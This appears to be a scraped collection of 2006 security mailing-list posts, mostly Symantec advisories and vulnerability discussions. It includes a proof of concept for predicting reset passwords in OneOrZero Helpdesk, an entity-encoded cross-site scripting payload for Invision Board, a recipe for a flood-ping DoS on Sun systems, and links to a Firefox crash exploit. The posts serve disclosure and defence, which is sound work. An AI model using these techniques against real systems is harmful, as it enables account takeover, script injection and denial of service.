The program committee welcomes original contributions not previously 
presented at any other conference or workshop on the following topics:


1.   Compliance / Audit

2.   Physical Security

3.   Infrastructure

4.   Information Security

5.   Forensics

6.   SCADA Security



Papers promoting vendor specific products or services will not be 
considered nor accepted.


Deadline is December 15th, sorry for the short notice. 


Please see http://www.trisc.org/ for more information.

SYM06-023, Symantec NetBackup PureDisk: PHP update to Address Reported Security Vulnerability

[Mike Prosser]

SYM06-023 
Nov 28, 2006 
Symantec NetBackup PureDisk: PHP update to Address Reported Security 
Vulnerability

Reference:  http://www.securityfocus.com/bid/20879/

Revision History
none 

Severity
High (configuration dependent) 

Remote Yes
Local No
Authentication Required Yes (to network)
Exploit publicly available No

Overview
Symantec has released an update to address a security concern in PHP, a 
commonly used HTML-embedded scripting language, for Symantec's Veritas 
NetBackup  6.0 PureDisk Remote Office Edition. A heap overflow has been 
reported in the version of PHP shipped with the affected product builds listed 
below.  The  management interface of Symantec's product is accessible only 
through an SSL connection by default.  Depending on configuration, however; an 
unauthorized user  could potentially attempt to execute arbitrary code in the 
context of the vulnerable server, which runs in non-privileged mode by default. 

Affected Product/Version
Product Version  Build  Solution(s)
Symantec Veritas NetBackup PureDisk Remote Office Edition (all platforms)
6.0GA, MP1 NB_PDE_60_MP1_S01

Not Affected
Symantec Veritas NetBackup PureDisk Remote Office Edition (all platforms)
6.1

Symantec Response
Symantec engineers have addressed the reported issue and provided Security 
updates. Symantec strongly recommends all customers apply the latest security 
update  identified above or upgrade to Symantec Veritas NetBackup PureDisk 
Remote Office Edition 6.1 to protect against threats of this nature. 
Symantec knows of no exploitation of or adverse customer impact from this 
issue. 

The patch is available from: http://support.veritas.com/docs/285984 for 
Symantec Veritas NetBackup PureDisk Remote Office Edition 6.0. 

Best Practices
As part of normal best practices, Symantec recommends: 
* Restrict access to administration or management systems to authorized 
privileged users only 
* Block remote access to all ports not essential for efficient operation 
* Restrict remote access, if required, to trusted/authorized systems only 
* Remove/disable unnecessary accounts or restrict access according to security 
policy as required 
* Run under the principle of least privilege where possible 
* Keep all operating systems and applications updated with the latest vendor 
patches 
* Follow a multi-layered approach to security. Run both firewall and antivirus 
applications, at a minimum, to provide multiple points of detection and 
protection to both  inbound and outbound threats 
* Deploy network intrusion detection systems to monitor network traffic for 
signs of anomalous or suspicious activity. This may aid in detection of attacks 
or malicious  activity related to exploitation of latest vulnerabilities 

CVE
CVE-2006-5465 has been assigned to this issue. 
This issue is a candidate for inclusion in the CVE list (http://cve.mitre.org), 
which standardizes names for security problems. 
--
Symantec takes the security and proper functionality of its products very 
seriously. As founding members of the Organization for Internet Safety 
(OISafety), Symantec  follows the principles of responsible disclosure. 
Symantec also subscribes to the vulnerability guidelines outlined by the 
National Infrastructure Advisory Council  (NIAC). Please contact [EMAIL 
PROTECTED] if you feel you have discovered a potential or actual security issue 
with a Symantec product. A Symantec Product  Security team member will contact 
you regarding your submission.

Symantec has developed a Product Vulnerability Handling Process document 
outlining the process we follow in addressing suspected vulnerabilities in our 
products.  We support responsible disclosure of all vulnerability information 
in a timely manner to protect Symantec customers and the security of the 
Internet as a result of  vulnerability. This document is available from 
http://www.symantec.com/security/

Symantec strongly recommends using encrypted email for reporting vulnerability 
information to [EMAIL PROTECTED] The Symantec Product Security PGP key can  be 
obtained from http://www.symantec.com/security/



-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- 
Symantec Product Security Team
Symantec takes the security of our products seriously as a responsible
disclosure company.  You can view our response policies at
http://www.symantec.com/security.
We will work directly with anyone who believes they have found a security
issue in a Symantec product to validate the problem and coordinate any 
response deemed necessary. 
 
Please contact [EMAIL PROTECTED] concerning security issues with Symantec
products.

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.0.6 (Build 6060)

iQEVAwUBRW3Pqhy6+gFWHby+AQhUJQgAux4e4+Za3jYVbRORMbPlPnNWNB4zM47m
IxSlXppVsZ1iU/tegvSwo62AwDCNRaRw5iERBlhF/VXiNe5UTe/B/HHczvC6GRj0
LuqumOW8RMX5Tuez3OgP3lwSMOI30sLHWa+7k5RmGTHstNPeWK90VwUzzpYS3RfA
klmlGYb2r30tKvDFiWlriClSCfpjSAaXdck

Flaw in Firefox 2.0 Final

[mike]

This flaw reported by Mozilla 
http://www.mozilla.org/security/announce/2006/mfsa2006-59.html
is still unfixed in the latest Firefox 2.0 final.

This exploit works in Firefox 2.0 Final: http://lcamtuf.coredump.cx/ffoxdie.html

"Jonathan Watt and Michal Zalewski independently reported timing dependent 
testcases that trigger crashes at the same place during text display. We have 
seen no demonstration that these crashes could be reliably exploited, but they 
do show evidence of memory corruption so we presume they could be. 
Note: Thunderbird shares the browser engine with Firefox and could be 
vulnerable if JavaScript were to be enabled in mail. This is not the default 
setting and we strongly discourage users from enabling JavaScript in mail."

Advisory for Oneorzero helpdesk

[Mike Klingler]

Permanant Link : http://www.whitedust.net/speaks/3043/


- Advisory for OneOrZero Helpdesk -

- OneOrZero Helpdesk -

AFFECTED PRODUCTS
=
OneOrZero Helpdesk v1.6.0 - v1.6.4


OVERVIEW


From the website: "The OneOrZero Open Source Task Management and Help Desk

System is a powerful task management and help desk application,
based to 'get the job done'."
http://www.oneorzero.com/

An insecure password reset allows external knowledge of what the
password is set to.



DETAILS
===
1. Information Disclosure

The forgot password function will reset the password after a security question
is answered.  However, the admin user has this password left blank by default
and is often left that way after the program is installed.  By
attempting to reset
the admin password and leaving the answer blank one can force a reset of the
password.  However, since the password reset function sets the password based
only on the username and the time on the server, the password that it is set
to can be determine easily. Once the time of a server is discovered determining
what the password is set to becomes trivial.


POC
===

1.
--

The password is generated with the following code:
$password = time().$_POST[username];

Quite often web servers will return the date on the servers for when
the request is
processed.  For example "Date: Thu, 12 Oct 2006 01:11:21 GMT"

The following command on a linux will return the unix time for the
system for when
the request was processed.

bash$ date --date="Thu, 12 Oct 2006 01:11:21 GMT" "+%s"
1160615001

Which allows us to deduce the return password of 1160615001admin

SOLUTION:
=
vendor contact:
[EMAIL PROTECTED] Sept. 28 Vendor notification.
[EMAIL PROTECTED] Sept. 29 Vendor reply

[EMAIL PROTECTED] Oct. 10 oneorzero v1.6.5.4 released to address this issue.



Credits
===
This vulnerability was discovered and researched by
Michael Klingler
whitehatguru at gmail.com
SecurityMetrics, Inc.

Flaw in Firefox 2.0 RC2

[Mike]

http://lcamtuf.coredump.cx/ffoxdie.html
this exploit still works with the latest Firefox 2.0 RC3

Re: Concurrency-related vulnerabilities in browsers - expect problems

[Mike]

http://lcamtuf.coredump.cx/ffoxdie.html
this exploit still works with the latest Firefox 1.5.0.7 and Firefox 2.0 RC1

Re: Apple Remote Desktop root vulneravility

[Mike Kuriger]

if I'm reading this right, it looks like a non-logged in workstation
could be vulnerable to a local root use if an admin is running an remote
install.  so the "attacker" would have to know that a remote operation
is going on and the "attacker" would need physical access.  or I may
just be reading this wrong.

~mike~


Yannick von Arx wrote:

> It seems so that the attacker needs a ARD enabled user plus vnc 
> password to access the client.
> Then he can send an install command over "Manage >  Send UNIX Command"
>
> We're talking about ARD 3.0 so we've got the new feature to lock 
> client's screen with a message.
> From my point of view it's not a vulnerability in ARD, just an 
> insecure point.
>
> Regards,
> Yannick von Arx
>
> On 19.09.2006, at 19:32, Erik Lat wrote:
>
>>
>> So in order for this vulnerability to be exploited, the attacker needs
>> to have a local account on the machine correct? Your exploitation 
>> explanation
>> is a bit construed. Any more info / demostrations would be helpful.
>>
>> -Erik
>>
>> On 18 Sep 2006 21:26:52 -
>> [EMAIL PROTECTED] wrote:
>>
>>> Background:
>>> ARD allows unix commands to be remotely sent from an admin 
>>> workstation. These commands can be run as root, because the ard 
>>> administrator can be given sudo access. This exploit involves 
>>> sending a unix command as root to install a package that was  copied
>>> to /tmp/. In this case, the app is Adobe CS 2.0 using the  adobe
>>> silent installation script. The script will mount disk  images as
>>> root, run the install, then cleanup. If a standard user  is logged
>>> in, they will see an icon on the dock for the install,  but should
>>> never see anything besides the icon.
>>>
>>> The issue:
>>> The process LoginWindow is owned by the logged in user. If the  
>>> system is at the login window, then the process LoginWindow is 
>>> owned by root. If the system is mounting a disk image visible only 
>>> to root, then the image will try to appear on the desktop.  Clicking
>>> the mouse will force the desktop to appear, as well as  the menus. A
>>> user sitting that the system will then see a finder  window, and the
>>> root users home directory. The login window can be  ignored, and the
>>> user has full root access. Files can be deleted  without
>>> authentication, and the trash can be emptied. If a user  tries to
>>> login, the login window will check their credentials, but  they will
>>> end up logging in to the root desktop with root privileges.
>>>
>>> The workaround:
>>> If you are trying to run a remote install script such as the Adobe 
>>> Silent installer, use the lock screen feature in ARD. This locks 
>>> the users desktop until the admin is done doing their thing.
>>>
>>> The end result:
>>> http://www.flickr.com/photos/metfoo/246858852/
>>>
>>> Adobes script:
>>> #!/bin/sh
>>> #
>>> # Example script to run the Adobe Creative Suite 2 Installer  silently.
>>> #
>>> #
>>> # Copyright: 2005 Adobe Systems, Inc.
>>> #
>>> #
>>>
>>>
>>> function detach_images
>>> {
>>> # umount any previous mounted installer images
>>> for NUMBER in 1 2 3 4
>>> do
>>> MOUNTED_POINT="/Volumes/Adobe Creative Suite Disk ${NUMBER} "
>>> /sbin/mount |/usr/bin/grep "${MOUNTED_POINT}" 2>/dev/null
>>> if [ $? -eq 0 ] ; then
>>> echo "Another \"${MOUNT_POINT}\" already attached."
>>> DEVICE=`/sbin/mount |/usr/bin/grep "${MOUNTED_POINT}"
>>> 2>/dev/ null |/usr/bin/cut -d" " -f1`
>>> if [ -b "${DEVICE}" ] ; then
>>> /usr/bin/hdiutil detach "${DEVICE}"   
>>> echo "Detaching \"${DEVICE}\"..."
>>> fi
>>> fi
>>> done
>>> }
>>>
>>>
>>> SAVEDIR="`pwd`"
>>> trap 'cd "${SAVEDIR}"' EXIT
>>>
>>>
>>> if [ $# -ne 2 ] ; then
>>> echo "usage: $0  "
>>> exit 1
>>> fi
>>>
>>> IMGDIR=$1
>>> CONFIG=$2
>>>
>>>
>>> # Check OS Version, Minimum is 10.2.8
>>> OSVERSION=`/usr/bin/sw_vers |/usr/bin/grep ProductVersion 

SYM06-16 Symantec NetBackup PureDisk Remote Office Edition Elevation of Privilege

[Mike Prosser]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Symantec Security Advisory

SYM06-015

16 August 2006 

Symantec NetBackup PureDisk:  Non-Privileged User Authentication Bypass
Elevation of Privilege

Revision History
None 

Severity
Medium (highly dependent on network configuration) 

Remote Access
Yes
Local Access
No
Authentication Required
Yes (to network) 
Exploit publicly available
No

Overview
Symantec discovered a security issue in Symantec's Veritas NetBackup 6.0
PureDisk Remote Office Edition. An unauthorized user with access to the
network and the
server hosting the management interface can potentially bypass the
management interface
authentication to gain access and elevate their privileges on the
system.

Supported Product(s) Affected 
Product:  Symantec Veritas NetBackup PureDisk Remote 
Office Edition (all platforms)
Version: 6.0
Builds: GA, MP1
Solution: NB_PDE_60_MP1_P01

NOTE: For systems running NetBackup 6.0 GA PureDisk Remote Office
Edition
it will be necessary to install Maintenance Pack 1  prior to applying
this
Security
Pack.
This issue ONLY affects the product and versions listed above. 
 
Details
An internal review revealed a potential elevation of privilege issue in
the
Symantec Veritas NetBackup PureDisk management interface.  The
management
interface is
accessible only through an SSL web connection by default.  However it is
possible for a
non-privileged user with access to the network and the server hosting
the
Symantec Veritas NetBackup
PureDisk management interface, to bypass the management interface
authentication and
further leverage their access to elevate privileged access on the
server.

Symantec Response
Symantec engineers have addressed the issues identified above and made
Security updates available.
Symantec strongly recommends all customers apply the latest security
update
to protect against threats of this nature.
Symantec knows of no exploitation of or adverse customer impact from
these
issues.


The patches listed above for affected products are available through the
following location: 
 http://support.veritas.com/docs/284734 for Symantec Veritas NetBackup
PureDisk Remote Office Edition.

Best Practices 
As part of normal best practices, Symantec recommends: 
- - - Restrict access to administration or management systems to
authorized
privileged users only
- - - Block remote access to all ports not essential for efficient
operation
- - - Restrict remote access, if required, to trusted/authorized systems
only
- - - Remove/disable unnecessary accounts or restrict access according
to
security policy as required 
- - - Run under the principle of least privilege where possible
- - - Keep all operating systems and applications updated with the
latest
vendor patches 
- - - Follow a multi-layered approach to security. Run both firewall and
antivirus applications, at a minimum, to provide multiple points of
detection and protection to
both inbound and outbound threats 
- - - Deploy network intrusion detection systems to monitor network
traffic
for
signs of anomalous or suspicious activity. This may aid in detection of
attacks or
Malicious activity related to exploitation of latest vulnerabilities

CVE 
A CVE Candidate name is being requested from the Common Vulnerabilities
and
Exposures(CVE) initiative for this issue. This advisory will be revised
accordingly
upon receipt of the CVE Candidate name.
This issue is a candidate for inclusion in the CVE list
(http://cve.mitre.org), which standardizesnames for security problems. 

-BEGIN PGP SIGNATURE-
Version: PGP Desktop 9.0.6 (Build 6060)

iQEVAwUBRON4lRy6+gFWHby+AQigiwgAwk0k8rQhhhC9lRiTuHm+sSjPCoLHRSH/
OkR2WNZxSMP3z4AkYeJ7r/h465diPIdnkwAK9Q7pWpberooK2ffF2e5QpgIGLvB+
GoyyZddrAoKdix8wcQj9bgix+W+OiD93Bmh1q/iSBdFgJ6IvQNzEwdqLr2LXkG+W
clz7Asv8LOn6p2kPACDQOKNGMJvlQD8csdRRo+bNUtjv8FGiZB7Q+NXKjlZa5JRB
+ZlXWKfrlY5mjREcd7cTumif88wG7B4vc6Be0aPI0bGnICLdTT+xCwnKaGVLR+0i
QucuAn5xJDn6of2HZ4IuGfKgTpdtO5uYIta5xRKhWew2r+1MjM5rTw==
=sQoe
-END PGP SIGNATURE-
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Symantec Security Advisory

SYM06-015

16 August 2006 

Symantec NetBackup PureDisk:  Non-Privileged User Authentication Bypass
Elevation of 
Privilege

Revision History
None 

Severity
Medium (highly dependent on network configuration) 

Remote Access
Yes
Local Access
No
Authentication Required
Yes (to network) 
Exploit publicly available
No

Overview
Symantec discovered a security issue in Symantec's Veritas NetBackup 6.0
PureDisk Remote 
Office Edition. An unauthorized user with access to the network and the
server hosting the 
management interface can potentially bypass the management interface
authentication to gain 
access and elevate their privileges on the system.

Supported Product(s) Affected 
Product:  Symantec Veritas NetBackup PureDisk Remote 
Office Edition (all platforms)
Version: 6.0
Builds: GA, MP1
Solution: NB_PDE_60_MP1_P01

NOTE: For systems running NetBackup 6.0 GA PureDisk Remote Office Edition
it will be

Lan-Aces Office Logic

[Mike]

Does anyone use this email client? I have to say It would be in your best 
intrest to turn off html messages until I speak with tech support at Lan-Aces. 
If they do not respond within 24 hours I will post a huge security bypass 
exploit that works for all html & scripting blocking mechanisim. With this 
said 

Re: New PowerPoint Trojan installs itself as LSP

[Mike Healan]

> Is this 'mechanism' very common and is it difficult to detect by AV? 

No, but you have to be damned careful removing something installed as an
LSP. I've seen literally hundreds of PCs with their network stack
buggered because the owner tried to remove NewDotNet. NewDotNet inserts
itself as an LSP.

Regards,
Mike Healan
www.spywareinfo.com

Juha-Matti Laurio wrote:
> It appears that there is a new type of PowerPoint 0-day Trojan spreading,
> more details at this write-up:
> http://www.symantec.com/enterprise/security_response/writeup.jsp?docid=2
> 006-071812-3213-99
> 
> What the technical details section says is:
> "Installs the file SNootern.dll as a layered service provider (LSP)"
> 
> Wikipedia has only stub type article
> http://en.wikipedia.org/wiki/Layered_Service_Provider
> 
> Is this 'mechanism' very common and is it difficult to detect by AV?
> 
> This new Trojan entitled as Riler.F opens a back door and tries to
> connect to 8800.org,
> earlier Bifrose Trojan uses (or used) this domain too.
> 
> There is a new C variant of Trojan.PPDropper as well, but no information
> about the file name of PowerPoint attachment etc.
> Symantec reports Infection Length as 220,160 bytes, same as used by
> Trojan.PPDropper.B.
> This size information is from Trojan description of another vendor,
> however.
> 
> This summary has been updated to related PowerPoint 0-day FAQ document.
> 
> Regards,
> Juha-Matti
> http://blogs.securiteam.com/index.php/archives/author/juha-matti/

Re: Msie 7.0 beta Crash

[mike]

Nothing happens on IE7 Beta3. No crash

Re: Sun single-CPU DOS

[Mike O'Connor]

:Sun says it is jabber, which is why I put it quotes. Since they have not
:replicated in lab, they are jumping to conclusions. Yes, I agree,
:it is very specific and the backline engineer usage appears 'stretching things'
Most Sun adapters have an actual jabber counter that netstat -k will 
spew out for you.  You can eliminate ambiguity easily enough.  Here's
an example I Google'd for:

netstat -k eri0
eri0:
ipackets 525571 ierrors 365 opackets 8446 oerrors 0 collisions 85
ifspeed 1000 rbytes 73324309 obytes 1118022 multircv 99205 multixmt 
6 brdcstrcv 415863
brdcstxmt 10 norcvbuf 0 noxmtbuf 0 inits 4 rx_inits 8 tx_inits 1
nocarrier 1 nocanput 0 allocbfail 0 drop 321 pasue_rcv_cnt 0
pasue_on_cnt 0 pasue_off_cnt 0 pasue_time_cnt 0 txmac_urun 0
txmac_maxpkt_err 0 excessive_coll 0 late_coll 0 first_coll 35
defer_timer_exp 0 peak_attempt_cnt 0 jabber 0 no_tmds 0

(see, "jabber")

tx_hang 0 rx_corr 0 no_free_rx_desc 0 rx_overflow 0 rx_hang 0
rx_align_err 64 rx_crc_err 19 rx_length_err 0 rx_code_viol_err 0
bad_pkts 321 runt 40 toolong_pkts 279 rxtag_error 0 parity_error 0
pci_error_interrupt 0 unknown_fatal 0 pci_data_parity_err 0
pci_signal_target_abort 0 pci_rcvd_target_abort 0 pci_rcvd_master_abort 0
pci_signal_system_err 0 pci_det_parity_err 0 ipackets64 525571
opackets64 8446 rbytes64 73324309 obytes64 1118022 pmcap 4

:In this case it's tcp/ip.
:
:step 1) telnet to router
:step 2) ping some remote device on a fast link (like  2GB IP/Sonet)
:step 3) watch as returning tcp/ip telnet stream DOS's the sun.
:
:it is not the cisco ping the is DOS'ing the sun, it is the return stream
:of !!..!.!!!!!!..!!!...  (ad infinitum)

Ahhh, so it's just the return traffic from the Cisco printing out all
those !!..!.!!! stuff (corresponding to whatever it is the the Cisco is
pinging) that causes all this?  Nifty!  I didn't think that the Cisco
could print that fast!  I'm fairly certain it should rate-limit/sample
that output (unless some automated thingy actually cares about that 
output coming from the Cisco).

:the nagle comes into play in the tcp-stream not coalescing all the
:single char tcp/ip packets each with a single ! or . in it.

Makes perfect sense now that I get what the traffic is.  As an aside,
the Nagle algorithm was designed with telnet explicitly in mind, per
RFC 896.  But, a lot of folks these days use telnet for stuff apart
from interactive use, and I could see someone wanting to disable it
for performance' sake.  For bare-bones stack implementations, Nagle
may not be there at all.

:right. totally agreed. it should not cause the machine to totally lock up.
:(I specified wrong earlier, btw. Break still works, just nothing else does)

That makes it sound even more like an interrupt issue rather than some
overall system lock.

:> In this particular case, if you're talking about ICMP, and there
:> really isn't a "jabber"/physical layer issue afoot, the idea is for
...
:getting that someone to not slap a 'jabber' label on things and
:dismiss it out of hand is where I am currently frustrated beyond
:belied.

Beyond netstat -k, you can probably use lockstat or other kernel
profiling tools as I mentioned in my earlier post to give them a
good idea of where the bug really is.  Interrupt issues aren't 
always going to be cut and dried.  There could be some particular 
flavor of IOS, network adapter, media type, CPU, OS, etc. that 
is more prone or less prone to the problem.  

:well, yes, this was all quite accidental in the first place.
:The solution is really quite easy, don't disable nagle on the
:cisco in the first place. However, I'm much more concerned about
:the implications of a normal user being able to DOS the machine and
:Sun not caring enough to do due dilligence to address the issue.

Judging from the amount of times we've exchanged emails (I should
have asked for a network diagram sooner to help visualize this :) ), 
sometimes it's not so easy.  And "what is or isn't a DoS" can be a
grey line where reasonable people may differ.  I could readily see 
someone saying "if you point a stupid amount of traffic at something
it dies, have you considered just not doing that?".  

-- 
 Mail: [EMAIL PROTECTED]  WWW: http://dojo.mi.org/~mjo/  Phone: +1 650 933 9487
 =--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--=
"Even in the future, nothing works!" -Dark Helmet

Re: Sun single-CPU DOS

[Mike O'Connor]

:Beyond netstat -k, you can probably use lockstat or other kernel
:profiling tools as I mentioned in my earlier post to give them a
:good idea of where the bug really is.  Interrupt issues aren't 
:always going to be cut and dried.  There could be some particular 
:flavor of IOS, network adapter, media type, CPU, OS, etc. that 
:is more prone or less prone to the problem.  

One other thought comes to mind is that it could be a particular tty
discipline or STREAMS issue at hand.  The -network- may not be as much
of a factor as "how does the particular traffic that ends up displayed
on the telnet client interplay with the OS".  I doubt that's the issue
in this particular case, but you never know.  I've seen a whole lot of
stranger things...

-- 
 Mail: [EMAIL PROTECTED]  WWW: http://dojo.mi.org/~mjo/  Phone: +1 650 933 9487
 =--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--=
"I was being patient, but it took too long."   -Anya, the Vengeance Demon

Re: Sun single-CPU DOS

[Mike O'Connor]

Doug,

:> :ping another device with interpacket delay of 0 and a count
...
:> Define what you mean by "interpacket delay".  Are you referring to an
...
:cisco router. extending ping. 0 delay.
:I was speaking of cisco ping.
:I should have said 'timeout'. mea culpa.

A between your using the term "interpacket" and your saying
that Sun was talking about "jabber", I had assumed you were talking
about the ethernet IPG / IFG.  Ignore my "don't complain about your
ethernet being DoS-ed if it's out-of-spec" remarks.  :)

:> For that manner, define "ping".  You're certainly not talking about
:running ping on the cisco to another device (preferably a fast
:cisco as the source and a nice fast interface like a gige or
:a IP/sonet)

Cisco extended ping where you answer the prompts in a way to perform
do a flood ping...  gotcha, makes somewhat more sense now.  

:dedicated, switched Ethernet here.
:it seems to mostly overwhelm the sun's interupt processing, but
:that's just a theory since Sun has decided that the solution is to
:unplug the machine on the other end.
:
:We're only talking about 14000 packets per second to kill a netra
:T1. I've been able to drive one faster than that via other means
:without causing a 'jabber effect'.

How are you concluding that this is "jabber"?  Does "netstat -k" show
the jabber and relevant physical-layer counters incrementing on the
ethernet interface in question, or is Sun just labelling that kind of
traffic flow as jabber in some generic sense?  The term "jabber" has
specific meaning in some network contexts, and you should be able to
determine if it really is or isn't physical-layer jabber if relevant
netstat -k counters are incrementing.

...
:> Now, that doesn't mean the -console-
:> should go out to lunch (sounds like you're getting a little too much
:> "The Network Is The Computer" :) ), 
...
:indeed. that's my issue, the console should not be hung. The machine
:should not require a hard reset. And, I do not believe there is
:an electrical problem. I'm not doing anything down that low, It's
:just a TCP/IP stream, and, a not outrageous one at at that.

Well, it's an IP stream, not necessarily TCP/IP -- more like ICMP/IP.
I don't see an option for Cisco's extended ping to do a "TCP" ping:

http://www.cisco.com/en/US/tech/tk365/technologies_tech_note09186a0080093f22.shtml

(though I haven't had a need to memorize every nook and cranny of IOS
in pursuit of some certification -- "I just make the stuff work...")
Your talking about "disabling Nagle" in your initial post made it sound
like a TCP stream, but if all you meant was setting the timeout to 0 on
a typical ping to do a flood, then TCP and TCP-specific mechanisms like
the Nagle algorithm aren't in play.

:> My -suspicion- here is that it's the interrupts that the "stream of
:> small TCP packets" generates that is leading to the system hang, but
:> it'd take some kernel profiling to understand the specific impact.
:> If the only way to generate the particular concentration of network
:> interrupts along that ethernet interface involves outright breaking
:> the ethernet spec, I can see where Sun rejects this as bogus from a
:> -security- perspective.
:>
:See, that's where I have trouble. From a Security perspective, you'd
:want to avoid the DOS via some kind of drop or disable mechanism
:in the first place... IMHO.

Well, I was talking about out-of-spec stuff when I wrote the above,
but a similar thing would apply to network traffic that totally fills
the pipe.  I can drop/block/disable all the traffic in the world, but
if more and more comes, my network is dead.  Depending on the type of
traffic, there may be absolutely nothing you can do to prevent the 
traffic from filling your network pipe and DoSing the interface.  Of
course, it shouldn't cause your console to silently hang up.

In this particular case, if you're talking about ICMP, and there 
really isn't a "jabber"/physical layer issue afoot, the idea is for
some combination of you and|or Sun to:

a) Find out if it's really a function of interrupt load.
 
   Someone with expertise with lockstat or other Sun kernel
   profiling tools should be able to discern that.  Look at
   the lockstat output for your system during a flood ping 
   vs. lockstat output from the system sitting there under 
   a "normal" network load and see if something stands out.

   It could be the case that the problem isn't necessarily
   interrupts, but the system being stuck in a particular 
   lock or codepath related to the traffic.  lockstat being
   driven by someone with clue should shake that out.
   
   Depending on the level of interrupt starvation, it may 
   be the case that lockstat won't log anything useful during
   the flood ping.  But, there's a whole lot of options and
   I'm not any particular expert in Solaris kernel internals.

b) If so, mitigate the interrupt load.  Assuming you isolate
   as an interrupt problem, the first step is to see if you
   can make the Sun do l

Re: Sun single-CPU DOS

[Mike O'Connor]

:single CPU Sun microsystems system running solaris7, 8, or 9
:(haven't tested on 10). E.g. netra.
:
:if you telnet to a local router, disable nagle (on purpose
:or by accident or whatever - if nagle is turned off), and then

TCP_NODELAY by any other name, I assume.  

:ping another device with interpacket delay of 0 and a count

Define what you mean by "interpacket delay".  Are you referring to an
Ethernet-specific setting, perhaps?  Ethernet's "interpacket gap" is
really about the gap between Ethernet frames, not IP packets.  Having
"packet" in the terminology leads people to think it's an IP thing,
and ranks up their with "collisions" as far as misleading Ethernet
terminology goes.  Think of it as "interframe gap", or IFG.

For that manner, define "ping".  You're certainly not talking about
/usr/sbin/ping, but something that spews out TCP, correct?  It sounds
like you're hitting the Sun system with a TCP ping stream -from- your
router, correct?

:of somewhere above 100,000 pings, it will effectively
:DOS the machine you are telneting from.
:
:The machine becomes unusable, will not accept break on console.
:totally hung.
:
:After opening a case with Sun on this issue and going back and
:forth for 9 months, they have decided that I am manufacturing
:jabber and the appropriate course of action is to remove the
:offending device (the router in this case) from the network.

If you're talking IFG...

Having an IFG < 96 "bittimes (where the wall-clock units for bittimes
varies as a function of specific ethernet speed) leads to out-of-spec
Ethernet frames, which could reasonably be parsed as "jabber".  The 
too-short IFG could lead the other node(s) in the ethernet not knowing
when you've stopped sending any given frame.  In a shared ethernet,
you can also end up with fun conditions like the "capture effect".

There's no requirement for the networking to that particular interface
on the Sun to actually work in the face of a too-short IFG or any other
physical out-of-spec condition.  Now, that doesn't mean the -console- 
should go out to lunch (sounds like you're getting a little too much 
"The Network Is The Computer" :) ), but it's perfectly ok to simply not
listen or xmit on an ethernet that's chronically out-of-spec.  

If Sun were to tweak things so it could detect and log the out-of-spec
network and react to it by downing the interface, rather than just keep
listening and accumulating a ton of bogusly-spaced interrupts that bog
it down, that would seem to be reasonable.  Some Unixes have userspace
routing daemons that periodically look for network brokenness and will
ifconfig the interface down  But, if the system is bogged down quickly
enough where that those processes never get a chance to run, such forms
of mitigation won't work.

Oh as an important side note -- your Sun is set up where it won't hang
owing to network dependencies if its interface is ifconfig'ed up, but
the actual network it talks to is offline, right?  Otherwise, you are
making yourself DoS-prone in a whole lot of ways besides pfutzing with
out-of-spec ethernets.

:In other words, they refuse to fix the DOS issue under the assertion
:that it is a physical issue rather than an issue of the OS
:improperly handling a stream of small TCP packets.

My -suspicion- here is that it's the interrupts that the "stream of
small TCP packets" generates that is leading to the system hang, but
it'd take some kernel profiling to understand the specific impact.
If the only way to generate the particular concentration of network
interrupts along that ethernet interface involves outright breaking
the ethernet spec, I can see where Sun rejects this as bogus from a
-security- perspective.  

Have you tried with, say, tiny UDP packets, without messing around
with the IFG (and no need to mess with the TCP-only Nagle algorithm)?
That might hit the interface hard in a way that will show the problem
without an out-of-spec ethernet (or it might not -- interrupt timing
attacks can be very "fussy").  Have you tried doing a back-to-back
configuration with another Sun?  It -could- be the case that only a 
very particular flavor of interrupt load triggers this, that it's
not a terribly generic problem.  

FWIW, there's a number of old (and sometimes not-so-old) ethernet NICs
that will "seize up" and need "kicking" (typically an ifconfig down/up
at a Unix OS level) in the face of various flavors of out-of-spec events
No, I don't have a laundry list of such NICs, though I'd imagine that
the folks http://iol.unh.edu might.  As long as the OS drivers for such
NICs don't take the rest of the OS down for the ride when the NIC hangs
up in the face of the out-of-spec event, it's not a big deal DoS in my
mind.  If you have some ethernet where it's way too easy to propagate 
out-of-spec ethernet events, fix the ethernet.  

:They have closed the escalation, so I am left with no recourse but
:to report it as a bug to the rest of you.
:
:For machines with more than 1 CPU, one cpu 

RE: Invision Vulnerabilities, including remote code execution

[Mike Weller]

Response inline

> -Original Message-
> From: Steven M. Christey [mailto:[EMAIL PROTECTED] 
> Sent: 26 April 2006 20:41
> To: bugtraq@securityfocus.com
> Subject: Re: Invision Vulnerabilities, including remote code execution
> 
> 
> >  sources/action_public/search.php line 1261  $this->output = 
> > preg_replace(  
> > "#(value=[\"']{$this->ipsclass->input['lastdate']}[\"'])#i", "\\1  
> > selected='selected'",  $this->output );
> >
> >...
> >an #e modifier is added and then %00 used which will be parsed as a 
> >null byte and truncate the string thus removing the original 
> )#i part.
> 
> This is a very interesting bug: modifying a regular 
> expression in a way that accesses the execution functionality.

> 
> In general, regexp hacking seems to be a fruitful area for research.
> As another example, null characters have been used to bypass 
> security-relevant regexp checks.
> 

Indeed. Invision is (to be frank) an appalling example of handling user
input. Posts go through a plethora of regexes, and there are
canonicalization issues all over the place with html and url escaped codes
(&#...; and %xx) being decoded where they shouldn't be decoded. Posts go
through numerous conversions on their way in to the database (where they are
mixed with HTML) and also on their way out, opening up a whole range of
potential vulnerabilities.

One example of this (that should work in current versions) is to insert the
following code into a new post:

<a href="#" 
f;nmouseover="&#
x6a;avascript:al
ert('Hey the
2;e');">Hover &#
x6f;ver this</a>

Decoded this is:

Hover over this

Somewhere in the source of IPB, this is decoded and ends up in the resulting
post.

Another problem is PHP's strings. All sorts of strange and wonderful things
happen when you start inserting line breaks, nulls, and backspaces (\x08).

I think an important area of development for modern web languages would be
to mark strings as being 'safe' (escaped) or not... and making it as hard as
possible for a programmer to use unsafe strings. I've even written a short
page describing an idea for a PHP class that should help developers avoid
issues with sanitation/escaping:

http://www.we11er.co.uk/programming/safestring.html 


> As "input validation" becomes more frequent, it seems likely 
> that these kinds of vulns will be introduced more often.  
> Other languages with rich regexp capabilities might be 
> subject to similar issues.
> 
> - Steve
> 

Mike

Re: Strengthen OpenSSH security?

[Mike Hoskins]

Brett Glass wrote:
It seems to me that sshd should not tip its hand by returning different 
responses when a user ID can be used for logins than when it can't -- 
